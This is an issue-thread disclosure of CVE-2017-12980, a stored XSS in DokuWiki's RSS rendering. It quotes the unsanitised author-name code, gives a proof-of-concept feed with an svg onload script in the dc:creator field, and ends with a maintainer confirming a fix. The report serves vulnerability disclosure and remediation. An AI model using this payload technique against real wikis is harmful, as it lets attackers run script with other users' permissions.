CVE-2017-12980 Stored XSS in xhtml.php with RSS/Atom feed

[trichimtrich]

Bug

Author tag in RSS/Atom feed is not well sanitized (with default config of SimplePIE, it'll not be stripped html special characters, dokuwiki uses the result directly). So attacker can force others to request a remote RSS/Atom feed contains malicious javascript to do requests in their permission.

Detail

/inc/parser/xhtml.php

function rss($url, $params) {
...
if($params['author']) {
    $author = $item->get_author(0);
    if($author) {
        $name = $author->get_name();
        if(!$name) $name = $author->get_email();
        if($name) $this->doc .= ' '.$lang['by'].' '.$name;
    }
}
...
}

PoC

remote RSS

<?xml version="1.0" encoding="ISO-8859-1"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:admin="http://webns.net/mvcb/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">
<item rdf:about="https://aaaapolitics.slashdot.org/story/17/08/16/1911253/after-losing-support-trumps-business-and-manufacturing-councils-are-shutting-down?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed">
<title>testing title</title>
<description>testing desc</description>
<dc:creator><![CDATA[  aaaa<svg onload=alert(1)>  ]]></dc:creator>
<dc:date>2017-08-16T19:20:00+00:00</dc:date>
</item>
</rdf:RDF>

dokuwiki document

{{rss>http://localhost/cc.rss 1 author date description 1h }}

[phy25]

Reproducible at https://www.dokuwiki.org/sandbox:issue-2081. A fix is available at #2086.

[trichimtrich]

The fixed works well

[fgeek]

Please use CVE-2017-12980 for this issue.